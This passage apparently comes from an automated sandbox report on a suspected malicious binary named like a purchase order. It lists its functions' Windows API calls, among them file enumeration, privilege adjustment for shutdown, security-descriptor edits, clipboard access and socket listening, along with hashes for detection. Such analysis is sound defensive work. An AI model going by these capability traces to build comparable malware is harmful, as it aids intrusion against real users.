                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessagePost$CtrlFocus
                                  • String ID: 0
                                  • API String ID: 1534620443-4108050209
                                  • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                  • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                  • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                  • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                  Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                  • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                  • FindClose.KERNEL32(00000000), ref: 00431B20
                                  • FindClose.KERNEL32(00000000), ref: 00431B34
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                  • FindClose.KERNEL32(00000000), ref: 00431BCD
                                  • FindClose.KERNEL32(00000000), ref: 00431BDB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                  • String ID: *.*
                                  • API String ID: 1409584000-438819550
                                  • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                  • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                  • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                  • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                  Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                  • __swprintf.LIBCMT ref: 00431C2E
                                  • _wcslen.LIBCMT ref: 00431C3A
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                  • String ID: :$\$\??\%s
                                  • API String ID: 2192556992-3457252023
                                  • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                  • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                  • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                  • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                  Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLocalTime.KERNEL32(?), ref: 004722A2
                                  • __swprintf.LIBCMT ref: 004722B9
                                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                  • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                  • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                  • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                  • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                  • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                  • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                  • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: FolderPath$LocalTime__swprintf
                                  • String ID: %.3d
                                  • API String ID: 3337348382-986655627
                                  • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                  • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                  • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                  • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                  Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                  • FindClose.KERNEL32(00000000), ref: 0044291C
                                  • FindClose.KERNEL32(00000000), ref: 00442930
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                  • FindClose.KERNEL32(00000000), ref: 004429D4
                                    • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                  • FindClose.KERNEL32(00000000), ref: 004429E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                  • String ID: *.*
                                  • API String ID: 2640511053-438819550
                                  • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                  • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                  • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                  • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                  Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                  • GetLastError.KERNEL32 ref: 00433414
                                  • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                  • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 2938487562-3733053543
                                  • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                  • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                  • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                  • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                  Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                    • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                    • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                  • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                  • GetLengthSid.ADVAPI32(?), ref: 00446241
                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                  • CopySid.ADVAPI32(00000000), ref: 00446271
                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                  • String ID:
                                  • API String ID: 1255039815-0
                                  • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                  • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                  • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                  • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                  Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                  Download Yara Rule
                                  APIs
                                  • __swprintf.LIBCMT ref: 00433073
                                  • __swprintf.LIBCMT ref: 00433085
                                  • __wcsicoll.LIBCMT ref: 00433092
                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                  • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                  • LockResource.KERNEL32(00000000), ref: 004330CA
                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                  • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                  • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                  • LockResource.KERNEL32(?), ref: 00433120
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                  • String ID:
                                  • API String ID: 1158019794-0
                                  • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                  • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                  • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                  • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                  Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                  • String ID:
                                  • API String ID: 1737998785-0
                                  • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                  • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                  • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                  • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                  Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157nativewindowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                    • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                  • NtdllDialogWndProc_W.USER32(?,00000205,?,?), ref: 00471145
                                  • 6FE0C580.COMCTL32(00000000), ref: 00471163
                                  • 6FE0C6F0.COMCTL32 ref: 00471169
                                  • ReleaseCapture.USER32 ref: 0047116F
                                  • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AsyncState$C580CaptureClientCursorDialogMessageNtdllProc_ReleaseScreenSendTextWindow
                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                  • API String ID: 4205032950-2107944366
                                  • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                  • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                  • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                  • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                  Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                  • GetLastError.KERNEL32 ref: 0045D6BF
                                  • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Error$Mode$DiskFreeLastSpace
                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                  • API String ID: 4194297153-14809454
                                  • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                  • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                  • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                  • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                  Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove$_strncmp
                                  • String ID: @oH$\$^$h
                                  • API String ID: 2175499884-3701065813
                                  • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                  • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                  • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                  • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                  Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                  • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                  • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                  • listen.WSOCK32(00000000,00000005), ref: 00465381
                                  • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                  • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorLast$closesocket$bindlistensocket
                                  • String ID:
                                  • API String ID: 540024437-0
                                  • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                  • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
